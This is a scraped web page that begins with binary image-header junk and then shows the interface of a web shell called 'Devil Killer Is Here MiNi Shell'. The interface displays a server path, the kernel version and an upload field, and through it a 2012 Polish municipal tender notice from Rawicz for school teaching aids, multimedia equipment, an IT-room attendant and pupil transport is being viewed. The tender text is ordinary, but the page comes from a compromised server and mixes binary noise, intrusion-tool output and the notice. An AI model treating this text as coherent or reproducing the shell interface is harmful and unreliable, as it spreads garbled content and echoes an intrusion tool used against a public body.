JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121217/514806-N-2012.html

<p class="kh_header"><b>Rawicz: Dostawa pomocy dydaktycznych, dowozy oraz pełnienie dyżuru w sali IT w SPZW w ramach realizacji projektu Chcę i potrafię</b><br>
<b>Numer ogłoszenia: 514806 - 2012; data zamieszczenia: 17.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Rawicz działający w imieniu Gminy Rawicz , ul. Piłsudskiego 21, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5465400, faks 065 5464167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rawicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych, dowozy oraz pełnienie dyżuru w sali IT w SPZW w ramach realizacji projektu Chcę i potrafię.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa pomocy dydaktycznych, dowozy oraz pełnienie dyżuru w sali IT na potrzeby realizacji projektu Chcę i potrafię - Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1: Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 

2.	Zakres zamówienia obejmuje w szczególności:

1)	CZĘŚĆ 1: Opiekun sali IT w Szkole Podstawowej w Zielonej Wsi,
2)	CZĘŚĆ 2: Dostawa sprzętu multimedialnego,
3)	CZĘŚĆ 3: Dostawa pomocy dydaktycznych,
4)	CZĘŚĆ 4: Dowozy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 48.00.00.00-8, 48.19.00.00-6, 39.16.20.00-5, 39.16.21.00-6, 60.10.00.00-9, 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DLA CZĘŚCI: 1-3 - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy.
DLA CZĘŚCI 4: Wykonawca musi posiadać uprawnienia do wykonywania określonej działalności. 
Zamawiający uzna za spełnienie tego warunku na podstawie załączonego do oferty posiadanego aktualnego zezwolenia lub aktualnej licencji na wykonywanie krajowego transportu drogowego osób, zgodnie z ustawą z dnia 06.09. 2001 roku o transporcie drogowym (t.j. Dz. U. z 2007 r. Nr 125 poz. 874 z póź.zm.) oraz Oświadczenia Wykonawcy potwierdzającego spełnienie tego warunku (załącznik nr 4.2 do SIWZ)
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DLA CZĘŚCI 1 i 3 - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy.
DLA CZĘŚCI 2 - Wykonawca musi posiadać niezbędną wiedzę i doświadczenie do realizacji niniejszego zamówienia. Zamawiający uzna warunek za spełniony w przypadku, gdy Wykonawca wykaże na podstawie załączonych dokumentów, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dokonał co najmniej jednej dostawy odpowiadającej przedmiotowi zamówienia, tj. dostawa sprzętu multimedialnego o wartości nie mniejszej niż 12 tys. brutto. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2.2 do SIWZ) wraz z załączonym do oferty wykazem wykonanych dostaw (załącznik nr 2.4 do SIWZ)  oraz dokumentami potwierdzającymi, że dostawy wymienione w wykazie zostały wykonane należycie.
DLA CZĘŚCI 4 - Wykonawca musi posiadać niezbędną wiedzę i doświadczenie do realizacji niniejszego zamówienia. Zamawiający uzna warunek za spełniony w przypadku, gdy Wykonawca wykaże na podstawie załączonych dokumentów, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dokonał co najmniej jedno zamówienie związane z przewozem osób o łącznej liczbie km nie mniej niż 250 km tygodniowo. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 4.2 do SIWZ) wraz z załączonym do oferty wykazem wykonanych usług (załącznik nr 4.4 do SIWZ) oraz dokumentami potwierdzającymi, że usługi wymienione w wykazie zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DLA CZĘŚCI 1-4 - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DLA CZĘŚCI 1 - Wykonawca musi posiadać dysponować odpowiednimi osobami zdolnymi do realizacji niniejszego zamówienia.  Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże że, dysponuje: jedną osobą będącą nauczycielem z przygotowaniem pedagogicznym. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 1.2 do SIWZ) wraz z załączonym do oferty wykazem osób, które będą uczestniczyć w wykonywaniu zamówienia (załącznik nr 1.4 do SIWZ).
DLA CZĘŚCI 2-4 - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DLA CZĘŚCI 1-4 - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniona i podpisana przez Wykonawcę oferta przetargowa (odpowiednio dla każdej części). 2) Oryginał pełnomocnictwa do reprezentowania (o ile ofertę składa pełnomocnik) lub kopia pełnomocnictwa poświadczona przez notariusza. 3) Dodatkowo dla CZĘŚCI 2 i 3 - Kalkulacja cen - opis przedmiotu zamówienia wg załączonego wzoru odpowiednio dla poszczególnej części.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza - jeżeli uzna za uzasadnione - możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy o których mowa w art. 144 ustawy PZP w następujących przypadkach: 
1)	potrzeby wykonania zamówień zamiennych lub odstąpienia od realizacji części zamówienia, i związanej z tym zmiany wynagrodzenia na wniosek Zamawiającego lub Wykonawcy,
2)	na uzasadniony wniosek Wykonawcy zaakceptowany przez Zamawiającego i pod warunkiem, że zmiana ta wynika z okoliczności których Wykonawca nie mógł  przewidzieć  na etapie składania oferty i nie jest przez niego zawiniona, 
3)	wystąpienia w trakcie realizacji zamówienia nieprzewidzianych okoliczności  powodujących, że wykonanie zamówienia będzie niemożliwa do wykonania zgodnie z ustalonymi trasami i godzinami bez wprowadzenia zmian w harmonogramie (np. zmiana godzin dowozu i odwozu, wprowadzenie zmiany organizacji ruchu na trasie przejazdu itd) - dotyczy części 4.
4)	zmiany urzędowej wysokości stawki podatku VAT, 
5)	wystąpienia zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych od Wykonawcy,  
6)	wprowadzenie lub zmiana zgłoszonych w ofercie części zamówień wykonywanych przy udziale Podwykonawcy, za uprzednią zgodą Zamawiającego, 
7)	zmiany  terminu realizacji zamówienia, 
8)	przekształcenie którejkolwiek ze stron umowy,
9)	zmiany personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego (np. osoby odpowiedzialne za  realizację zamówienia itp.)
10)	warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna i niezbędna dla Zamawiającego,
11)	innych niezbędnych zmian pod warunkiem, że są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rawicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego: Urząd Miejski Gminy Rawicz ul. Piłsudskiego 21, 63-900 Rawicz, pokój 111 w cenie 20,00 PLN, którą należy wpłacić w kasie Urzędu lub za zaliczeniem pocztowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.01.2013 godzina 10:00, miejsce: w siedzibie Zamawiającego - w sekretariacie Urzędu Miejskiego Gminy Rawicz, ul. Piłsudskiego 21, 63-900 Rawicz, pokój nr 6..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie jest finansowane ze środków Unii Europejskiej - Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1: Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.  2. Wszelkie oświadczenia, wnioski, zawiadomienia, wezwania oraz inne informacje i dokumenty w postępowaniu o udzielenie zamówienia ZAMAWIAJĄCY i WYKONAWCY przekazują pisemnie. 3. ZAMAWIAJĄCY dopuszcza również możliwość porozumiewania się OBU STRON (Wykonawca, Zamawiający) za pomocą: faksu (65) 546-41-67 oraz poczty elektronicznej przetargi@rawicz.pl. 4. Jeżeli ZAMAWIAJĄCY lub WYKONAWCA przekaże faksem lub drogą elektroniczną dokumenty lub informacje, o których mowa wyżej, każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt ich otrzymania. 5. Zamawiający nie przewiduje zawarcia umowy ramowej. 6. Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opiekun sali IT w Szkole Podstawowej w Zielonej Wsi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach CZĘŚCI 1 Wykonawca zobowiązany będzie do:
1)	pełnienia dyżuru w sali IT (udostępnionej na realizację elementu elerningowego) w okresie: od dnia podpisania umowy do 06.2013, 09.2013-06.2014  (min 1h/tyg), liczba godzin (łącznie w dwóch latach szkolnych): 60
2)	udziału w szkoleniu z zakresu obsługi platformy elearningowej,
3)	pełnienia dyżurów zgodnie z projektem i harmonogramem Projektu Chcę i potrafię, wg zaakceptowanego harmonogramu;
4)	pełnej dyspozycyjności wykładowców w dniach, w których realizowane będą zajęcia, w miejscu wykonywania zamówienia - w związku z koniecznością dostosowania się do harmonogramu zajęć przygotowanego przez Zamawiającego,
5)	dokumentowanie przebiegu dyżurów na raportach miesięcznych;
6)	prawidłowego i systematycznego prowadzenia dokumentacji projektu oraz comiesięcznego przekazywania w formie elektronicznej i papierowej informacji sekretarzowi projektu, w której realizowany jest projekt o stanie realizacji planu dyżurów, w tym ilości korzystających z sali IT;
7)	wspomagania promocji i ewaluacji projektu - informowania o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego oraz współpraca z sekretarzem projektu;
8)	ponoszenia odpowiedzialności za bezpieczeństwo uczniów w trakcie dyżurów oraz za doprowadzenia dzieci przyjezdnych do środka transportu;
9)	ponoszenia odpowiedzialności materialnej za mienie;
10)	przestrzegania regulaminu sali, w której pełni dyżur;
11)	bieżącego informowania sekretarza projektu o problemach mogących mieć wpływ na terminową lub prawidłową realizację przedmiotu umowy;
12)	oznaczenia każdego dokumentu logotypem Unii Europejskiej i Programu Operacyjnego Kapitał Ludzki.
13)	Ponadto Zamawiający informuje, że:
a)	Zamawiający udostępni sale szkoleniowe nieodpłatnie.
b)	Za 1 h zajęć uważa się 1 godzinę lekcyjną..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa sprzętu multimedialnego,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia dla części 2- zakres zamówienia zawarto w kalkulacji ceny  stanowiącej zał. nr 2.7 (dla części 2)  do SIWZ.

1)	Przedmiot zamówienia obejmuje dostawę do ośmiu szkół podstawowych z terenu gminy Rawicz, tj: Szkoła Podstawowa Nr 1 w Rawiczu, Szkoła Podstawowa Nr 3 w Rawiczu, Szkoła Podstawowa Nr 4 w Rawiczu, Szkoła Podstawowa Nr 5 w Rawiczu, Szkoła Podstawowa Nr 6 w Rawiczu, Szkoła Podstawowa w Masłowie, Szkoła Podstawowa w Zielonej Wsi, Szkoła Podstawowa w Słupi Kapitulnej.
2)	Wszystkie dostarczone materiały muszą być fabrycznie nowe, tzn. że żadna część składająca się na dany materiał nie może być używana , oraz wszystkie urządzenia i sprzęt muszą posiadać certyfikaty i atesty dopuszczające do użytku w szkole.
3)	Wykonawca jest zobowiązany zgłosić Zamawiającemu dostawę w terminie na 2 dni robocze przed terminem dostawy do poszczególnych placówek oświatowych na terenie gminy Rawicz. - koszty dostawy ponosi Wykonawca.
4)	termin wykonania 1 etapu zamówienia, tj. dostawy sprzętu multimedialnego o wartości co najmniej 80% wartości oferty Wykonawcy, ustala się na - 28 lutego 2013 r. Termin zakończenia wykonania przedmiotu umowy ustala się na - 11 marca 2013 r. Zamawiający dopuszcza możliwość złożenia całego zamówienia w 1 etapie.

5)	Zamawiający informuje, iż wskazanie nazw zwyczajowych czy producentów w zamieszczonych opisach przedmiotu zamówienia służy wyłącznie określeniu cech technicznych i jakościowych.
	Zamawiający dopuszcza możliwość przedstawienia w ofercie towaru równoważnego pod warunkiem, iż oferowany towar będzie o takich samych lub lepszych parametrach technicznych, jakościowych, funkcjonalnych oraz użytkowych. W takim przypadku, Wykonawca zobowiązany jest przedstawić wraz z ofertą jego szczegółową specyfikację, z której w sposób nie budzący żadnej wątpliwości Zamawiającego winno wynikać, iż zaoferowany towar jest o takich samych lub lepszych parametrach technicznych, jakościowych, funkcjonalnych oraz użytkowych w odniesieniu do towaru określonego przez Zamawiającego w opisie przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 48.00.00.00-8, 48.19.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa pomocy dydaktycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia dla części 3 - zakres zamówienia zawarto w kalkulacji ceny  stanowiącej zał. nr 3.5  do SIWZ.

1)	Przedmiot zamówienia obejmuje dostawę do ośmiu szkół podstawowych z terenu gminy Rawicz, tj: Szkoła Podstawowa Nr 1 w Rawiczu, Szkoła Podstawowa Nr 3 w Rawiczu, Szkoła Podstawowa Nr 4 w Rawiczu, Szkoła Podstawowa Nr 5 w Rawiczu, Szkoła Podstawowa Nr 6 w Rawiczu, Szkoła Podstawowa w Masłowie, Szkoła Podstawowa w Zielonej Wsi, Szkoła Podstawowa w Słupi Kapitulnej.
2)	Wszystkie dostarczone materiały muszą być fabrycznie nowe, tzn. że żadna część składająca się na dany materiał nie może być używana , oraz wszystkie urządzenia i sprzęt muszą posiadać certyfikaty i atesty dopuszczające do użytku w szkole.
3)	Wykonawca jest zobowiązany zgłosić Zamawiającemu dostawę w terminie na 2 dni robocze przed terminem dostawy do poszczególnych placówek oświatowych na terenie gminy Rawicz. - koszty dostawy ponosi Wykonawca.
4)	termin wykonania 1 etapu zamówienia, tj. dostawy pomocy dydaktycznych o wartości co najmniej 80% wartości oferty Wykonawcy, ustala się na - 28 lutego 2013 r. Termin zakończenia wykonania przedmiotu umowy ustala się na - 11 marca 2013 r. Zamawiający dopuszcza możliwość złożenia całego zamówienia w 1 etapie.
